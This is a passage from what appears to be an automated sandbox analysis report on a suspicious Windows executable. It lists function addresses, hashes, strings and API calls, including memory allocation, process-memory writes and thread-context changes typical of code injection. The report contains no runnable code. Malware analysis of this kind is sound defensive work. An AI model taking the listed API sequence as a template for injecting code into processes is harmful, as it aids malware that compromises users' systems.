Instruction Fuzzy Hash: 8C913970E00209DFEF68DF69D994B6EB7F2AB88705F108529E8019B394DB749D45CBA0

Function 06F97180 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F974C8
$^q, xrefs: 06F974BC
$^q, xrefs: 06F9761C
$^q, xrefs: 06F97688
.5vq, xrefs: 06F971DB
$^q, xrefs: 06F97462
$^q, xrefs: 06F97694

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 5bbb318fa9ba211ad447e9abbe66c7e2d5ac561c710b866d1a931953b4434a42
Instruction ID: 34c88acb49c9527bc8dd088f54c64640d44c65f6effb25538cf104b132ae100f
Opcode Fuzzy Hash: 5bbb318fa9ba211ad447e9abbe66c7e2d5ac561c710b866d1a931953b4434a42
Instruction Fuzzy Hash: 74F14E35A10308CFEB59EF68D594A6EB7B6FF88301F248469D4059B3A4DB35DC82CB51

Function 06F984B8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F98777
$^q, xrefs: 06F98783
$^q, xrefs: 06F98712
$^q, xrefs: 06F9871E

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: d246156ea4447c297f7b5dc68b1c9dd7d49db62947d329aad1cd769c8270d29f
Instruction ID: 92062197f8e9bc1df7e07671c6284304e8ab3ba322c4c59e2df9e019fcdf60d3
Opcode Fuzzy Hash: d246156ea4447c297f7b5dc68b1c9dd7d49db62947d329aad1cd769c8270d29f
Instruction Fuzzy Hash: F4B14E34E102098FEF58DF69D5806AEB7B2FF89341F248829D4169B394DB35DC86CB91

Function 06F988D0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR^q, xrefs: 06F989C3
$^q, xrefs: 06F9895B
$^q, xrefs: 06F9894F
LR^q, xrefs: 06F98A12

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 007427868a896ffce1d5501db48efb7487beb067282e6f532cd08039057dee7f
Instruction ID: 75bde07a209bdea05bb3234827dcbc4da3b21e57c0e2f5bf1a6664bed5e12296
Opcode Fuzzy Hash: 007427868a896ffce1d5501db48efb7487beb067282e6f532cd08039057dee7f
Instruction Fuzzy Hash: 5851C631B002059FEF54DF28D940A6E77E6FF89744F108969E4169B3A9DB30EC45CBA1

Function 06F9AD9A Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

$^q, xrefs: 06F9AEC9
$^q, xrefs: 06F9AF4B
$^q, xrefs: 06F9AF74
$^q, xrefs: 06F9AF1C

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 9b15fd782afaf1a5d7a5418b317dc6751c043a7d65a458170ebf5c11d2c45032
Instruction ID: be34e284e644b1c795608505247b82af51adf1a66c80da5473eabb67ef671d37
Opcode Fuzzy Hash: 9b15fd782afaf1a5d7a5418b317dc6751c043a7d65a458170ebf5c11d2c45032
Instruction Fuzzy Hash: 2D51A374E10204CFEF65DB68E9806AEB3B2EF88719F10852AD405DB354DB31DC46CBA1

Analysis Process: newapp.exePID: 8136, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	138
Total number of Limit Nodes:	21

Executed Functions

Function 00D8D468 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D8D4F6
GetCurrentThread.KERNEL32 ref: 00D8D533
GetCurrentProcess.KERNEL32 ref: 00D8D570
GetCurrentThreadId.KERNEL32 ref: 00D8D5C9

Memory Dump Source

Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e3cf5c814e5040bdbe5031e5fbb3485b35a6e30cef4b883e8e1e14a37855fe8d
Instruction ID: c8793ccba723ed52596566a0c07e48c45772b53d1967073cb220c1b75f1c930e
Opcode Fuzzy Hash: e3cf5c814e5040bdbe5031e5fbb3485b35a6e30cef4b883e8e1e14a37855fe8d
Instruction Fuzzy Hash: E05156B09002498FDB18DFA9D548BDEBFF2EF49318F248469D419A73A0DB349984CF65

Function 00D8D478 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D8D4F6
GetCurrentThread.KERNEL32 ref: 00D8D533
GetCurrentProcess.KERNEL32 ref: 00D8D570
GetCurrentThreadId.KERNEL32 ref: 00D8D5C9

Memory Dump Source

Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: bf9870d135388954dd3b337299c9adb824f62a6b5c5911320240dbddc81d66d2
Instruction ID: df549894d4bd7e3514e9e5a774b3c30928910069ce5e1dc03057edd6302ed410
Opcode Fuzzy Hash: bf9870d135388954dd3b337299c9adb824f62a6b5c5911320240dbddc81d66d2
Instruction Fuzzy Hash: FA5137B09002098FDB18DFAAD548B9EBFF1FB49318F24C469D419A73A0D774A984CF65

Function 0556B930 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0556BB66

Memory Dump Source

Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5560000_newapp.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f4fd3f631e2bf373d69478a0907c9339b5aad9478a0edd6cf04d16007f94b9fa
Instruction ID: 515d99ea7be7dda2d7401f42dd2efd5f1b4a2e7871d49117f29698afb42d4ae1
Opcode Fuzzy Hash: f4fd3f631e2bf373d69478a0907c9339b5aad9478a0edd6cf04d16007f94b9fa
Instruction Fuzzy Hash: 02915B71D00259DFDB24CF69C841BEDBBB2BF48320F1481A9E859E7250DB749A85CF92

Function 00D8ADE8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D8B03E

Memory Dump Source

Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a5a4f590fb7d85f7b8ee04ac3ebb5e9bbd31aa091ed685162270e022aff5de7a
Instruction ID: 35f31ae42f640d0f6327973401885336b4b19feeb5f4b665249be993ffaa8cd7
Opcode Fuzzy Hash: a5a4f590fb7d85f7b8ee04ac3ebb5e9bbd31aa091ed685162270e022aff5de7a
Instruction Fuzzy Hash: 3D714470A00B058FE724EF29D04575ABBF1FF88300F04892EE09ADBA50D735E845CBA1

Function 00D844B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D859C9

Memory Dump Source

Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_newapp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d5b9d18e723649e6a9a91ec7baddc396297b955201c75fcf17ac44ac80ede85d
Instruction ID: 1972f981c08e3cf0b0355194f33e324adba934a8635151d7ec565ecc3f77631a
Opcode Fuzzy Hash: d5b9d18e723649e6a9a91ec7baddc396297b955201c75fcf17ac44ac80ede85d
Instruction Fuzzy Hash: 3F41D1B0C0061DCBDB24DFA9C884BDEBBB5BF48304F24816AD408AB255DB756985CFA0

Function 00D8590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D859C9

Memory Dump Source

Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_newapp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3efc27f579262b9461380b0911ab0e444412c35bd1b3cbcd18b7fd1c7b3dc976
Instruction ID: ed30f560ab410a94b9f610052d98b8a3830c716d43d37bb72978fda792f247db
Opcode Fuzzy Hash: 3efc27f579262b9461380b0911ab0e444412c35bd1b3cbcd18b7fd1c7b3dc976
Instruction Fuzzy Hash: 8941E3B0C00719CFDB28DFA9C884BCDBBB5BF49304F24815AD458AB255DB756985CF90

Function 0556B6A8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0556B738

Memory Dump Source

Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5560000_newapp.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 032d5926c3164b43a2552a816e7a2b5b88da2a24174da2ac0d1fad23ff37bbe4
Instruction ID: 9b3bd3d474d2ddb33367eb53418a78f51e205400db45de43c501768cf4779e73
Opcode Fuzzy Hash: 032d5926c3164b43a2552a816e7a2b5b88da2a24174da2ac0d1fad23ff37bbe4
Instruction Fuzzy Hash: EC2136B59003599FCF10CFA9C885BDEBBF5FF48324F10842AE959A7250C7789944CBA5

Function 0556B790 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0556B818

Memory Dump Source

Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5560000_newapp.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 875ae8ee72fc3f413b17f81b813e70b8984e0b7548c62789bb455167eea78d35
Instruction ID: 727ce27d5224a423a6b921cbca8fb58cde4f3589b1f1ce4cbbdfe4fde0694668
Opcode Fuzzy Hash: 875ae8ee72fc3f413b17f81b813e70b8984e0b7548c62789bb455167eea78d35
Instruction Fuzzy Hash: 3D212AB1D003599FCB10DFA9C881AEEFBF5FF48320F108429E959A7250D7349944CBA5

Function 00D8D6B9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D8D747

Memory Dump Source

Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d008afa9077d8155fdee6aab71c07535477aa58897fddd569b44a3e5def16b1c
Instruction ID: b645430ba88a00ca29832fef6ac2c286cfd504c17a78bc8c40b71dd3a6ab3290
Opcode Fuzzy Hash: d008afa9077d8155fdee6aab71c07535477aa58897fddd569b44a3e5def16b1c
Instruction Fuzzy Hash: CF2103B59002589FDB10CFAAD984AEEBFF5EB48310F14842AE954A3350C374A940CF61

Function 0556B798 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0556B818

Memory Dump Source

Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5560000_newapp.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0e60fcec29fb17dba49b7e18c339794ca2649c88b18d4397ef72e0c43b6272bb
Instruction ID: 9bd27933f0a662b674534c0e2ecdfb87db966fbde1cf7fda355f8e20139ffafc
Opcode Fuzzy Hash: 0e60fcec29fb17dba49b7e18c339794ca2649c88b18d4397ef72e0c43b6272bb
Instruction Fuzzy Hash: CB2137B1C003599FCB10DFAAC881AEEFBF5FF48320F10842AE559A7250C7389944CBA5

Function 0556B0D8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0556B156

Memory Dump Source

Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5560000_newapp.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c96d5a3ba9bb83300327b52f8a4c6cb5c79f79f84155d5f86900a9958467fa75
Instruction ID: 495e65df63cd88b32be41676be3a416daa02d5379d89d5c3703d1959cc95c805
Opcode Fuzzy Hash: c96d5a3ba9bb83300327b52f8a4c6cb5c79f79f84155d5f86900a9958467fa75
Instruction Fuzzy Hash: 042138B1D002499FDB10DFAAC4857EEBBF4FF48324F108429D459A7240DB789985CFA5

Function 00D8D6C0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D8D747

Memory Dump Source

Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 48ea76aaeb0f474dd52ddb35b6e60ed32e17da23121761a130d4966772f6c4dc
Instruction ID: a3addd285f3b6653e765b03baf0612acfb30697f7e38c38f413306a5315db5d8
Opcode Fuzzy Hash: 48ea76aaeb0f474dd52ddb35b6e60ed32e17da23121761a130d4966772f6c4dc
Instruction Fuzzy Hash: 8221E2B59002189FDB10CFAAD984ADEBBF9EB48320F14841AE918A3350C374A940CFA5

Function 0556B5E0 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0556B656

Memory Dump Source

Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5560000_newapp.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5fc419b5f32edbd924ae0a9fae3132351d20740365314c0b457f75c18600ab6a
Instruction ID: 9d491b0933378d60f9874874321cedc56d9507c5b7a6c547397a0ae2c0ff910c
Opcode Fuzzy Hash: 5fc419b5f32edbd924ae0a9fae3132351d20740365314c0b457f75c18600ab6a
Instruction Fuzzy Hash: 811159B28002499FCB10DFA9D845ADFBFF5FF88320F108419E559A7250CB759594CFA5

Function 0556B5E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0556B656

Memory Dump Source

Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5560000_newapp.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6ec8795c9fc5fd69d83485afca1d8d7895ec5bb585fa207b623490ec7f498e57
Instruction ID: c5d293764c84682a9a5b17d753001c068bc9409c4e39327b27ce4160181b4ab2
Opcode Fuzzy Hash: 6ec8795c9fc5fd69d83485afca1d8d7895ec5bb585fa207b623490ec7f498e57
Instruction Fuzzy Hash: 961137B29002499FCB10DFAAC844BDEBFF5FF88320F108419E559A7250C775A554CFA5

Function 0556B028 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0556B08A

Memory Dump Source

Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5560000_newapp.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f81ba7e2eae8ac379ec5456340481e71dc5f8c99e20083e017d2ea49682af30a
Instruction ID: 97731b86afbfe568529eb7de4c669ddb5d7813ef85adb14f5fccadb0f0dbc6a4
Opcode Fuzzy Hash: f81ba7e2eae8ac379ec5456340481e71dc5f8c99e20083e017d2ea49682af30a
Instruction Fuzzy Hash: 1C1136B1D002488FCB20DFAAC4457DEFFF5EB88324F208829D559A7250CB75A944CFA5

Function 0556E228 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0556E28D

Memory Dump Source

Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5560000_newapp.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f3eb3a1fad3b055fd1e7c9e266da4c42bf998d89d1ddafe16e65bfed3bf45c04
Instruction ID: 04ae0c88a6411132422b81444f550ce6830586c3760dbb7a8341ad983555b34d
Opcode Fuzzy Hash: f3eb3a1fad3b055fd1e7c9e266da4c42bf998d89d1ddafe16e65bfed3bf45c04
Instruction Fuzzy Hash: 8311E0B58003499FDB10DF9AD845BDEBBF8FB48320F20841AE958A7250C375A544CFA5

Function 05569E78 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0556E28D

Memory Dump Source

Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5560000_newapp.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 09f752afa42105d9d2431319429b75839de3c749e622f062e91660f8e969096c
Instruction ID: 2f22fc7bed51473ae3d02e0fce4ed7dd519cd4d421ffb82bbd234c788b6ac284
Opcode Fuzzy Hash: 09f752afa42105d9d2431319429b75839de3c749e622f062e91660f8e969096c
Instruction Fuzzy Hash: 5E11F2B58003489FDB10DF9AC489BDFBBF9FB48320F108419E558A7200C375A944CFA5

Function 00D8AFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D8B03E

Memory Dump Source

Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d80000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3563c4d7ddeeebe8510284068fadd054b7005efb394182e2ece42cf2c580906d
Instruction ID: 9cf5858801efc606648eee7af0be04a1b8a610b5f5f8fe2c15256b8c88851fe4
Opcode Fuzzy Hash: 3563c4d7ddeeebe8510284068fadd054b7005efb394182e2ece42cf2c580906d
Instruction Fuzzy Hash: 8A110FB5C002498FCB10DF9AC444ADEFBF8EB89324F14842AD528A7210D379A545CFA5

Function 00D2D110 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1942747197.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d2d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca56d4f203204c47135d4785264a044350d77a2cfbe36099792c3c346acf0f9
Instruction ID: 72e1dd506f7ae4dd012a7ab5f22f19c7cb82b89d45ef225c140d4d276244e851
Opcode Fuzzy Hash: fca56d4f203204c47135d4785264a044350d77a2cfbe36099792c3c346acf0f9
Instruction Fuzzy Hash: EB210071604300DFDB06DF14E9C0B27BF66FBA8318F24C169E9494B656C336D866CAB2

Function 00D3D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1943269739.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d3d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1594445a0571be7f191c20c02d1c5546594fb51f77e19eeeeba15619b3f28e51
Instruction ID: 56ea4bbf63f945e891679dd2b28ff932ebca0e319b18afaec2f9f7dcff46561f
Opcode Fuzzy Hash: 1594445a0571be7f191c20c02d1c5546594fb51f77e19eeeeba15619b3f28e51
Instruction Fuzzy Hash: 48210479504200EFDB05DF14E9C0B27BBA6FB84314F24C66DE8494B296C736D84ACE75

Function 00D3D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1943269739.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d3d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e997f4aad66f224e8f9822ff0168e20ff80a2cb4032318d2dfd35e5609ac03
Instruction ID: 3495780448f1b9d103e07fa9cf003570ec7ed1b3172206a02459f91b13f6ca12
Opcode Fuzzy Hash: c8e997f4aad66f224e8f9822ff0168e20ff80a2cb4032318d2dfd35e5609ac03
Instruction Fuzzy Hash: 6221F271604200DFCB18DF24E9C4B26BBA6FB84B14F24C569E84A4B296C33AD847CE71

Function 00D3D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1943269739.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d3d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ac6d0dc8eb2c75a54d6852d1e7326e35dfe14183acd1198f256566a000812c
Instruction ID: 562eccace7cee81d836d535df05c066562d9381761c3c86edafd71c71cbbd056
Opcode Fuzzy Hash: 95ac6d0dc8eb2c75a54d6852d1e7326e35dfe14183acd1198f256566a000812c
Instruction Fuzzy Hash: C02180755093808FCB06CF24D994715BF72EB46314F28C5EAD8498F2A7C33A980ACB62

Function 00D2D10B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1942747197.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d2d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: ecf6faf5a8ac4b19c9fcc50f79d3e8ea7bb74a1efd31bacd9dc3eb0b7053982b
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: B011D376504380CFCB16CF10D9C4B16BF72FBA4318F28C5A9D9094B656C336D86ACBA2

Function 00D3D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1943269739.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d3d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 48e9ea82db0ec22ec01479de0a851d97431f534ac25e63a7a7d3569866c0af2d
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: D9118B79504280DFDB16CF14D5C4B16BBA2FB84314F28C6AAD8494B696C33AD85ACF61

Analysis Process: newapp.exePID: 2260, Parent PID: 8136COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	151
Total number of Limit Nodes:	19

Executed Functions

Function 06F13570 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F13CA4
$^q, xrefs: 06F13C6F
$^q, xrefs: 06F13C98
$^q, xrefs: 06F13C7B
$^q, xrefs: 06F13CC8
$^q, xrefs: 06F13CBC

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: f3ded0f63a241c37118f08907bfb522bbdeb2948bd8f1b71837ba1f1a18c91c6
Instruction ID: 29b4d718b30cc4ea61ae6543c6de63faa2777d4af101a886e0212657c47abf8b
Opcode Fuzzy Hash: f3ded0f63a241c37118f08907bfb522bbdeb2948bd8f1b71837ba1f1a18c91c6
Instruction Fuzzy Hash: 7E321E31E1061A8FCB54DF79D85469DB7B6FF89300F10D6AAD409AB264EF30AD85CB81

Function 06F1B307 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84664db4be574377b067ed890dca858a4722606b15902f08bfb3992adc0becf9
Instruction ID: 638fd8802a1eb15ea62b30666ac59dd7e4d0c3b7fdd51fcab6c7615094450632
Opcode Fuzzy Hash: 84664db4be574377b067ed890dca858a4722606b15902f08bfb3992adc0becf9
Instruction Fuzzy Hash: 76224C30E00109CFDF64CB68D4947AEB7A6EB89350F24882AE405EF395DA35DC86CB91

Function 06F156B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2017670171.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f10000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b24c7c35e53d2530dece2f0b279044887fc7178ede61b35d0a7014dbb6d89f03
Instruction ID: 2c53498700d38a08d9ae1446ecd1a7e41fda47ed088270219804809110a5a9ba
Opcode Fuzzy Hash: b24c7c35e53d2530dece2f0b279044887fc7178ede61b35d0a7014dbb6d89f03
Instruction Fuzzy Hash: B891C1F5E182198FDF608B68C49076EFBA2FB853B0F558466E8A9DF285C235DC40C791

Function 06F1ADB0 Relevance: 10.4, Strings: 8, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F1AEDD
$^q, xrefs: 06F1AF30
$^q, xrefs: 06F1AF88
$^q, xrefs: 06F1AF5F
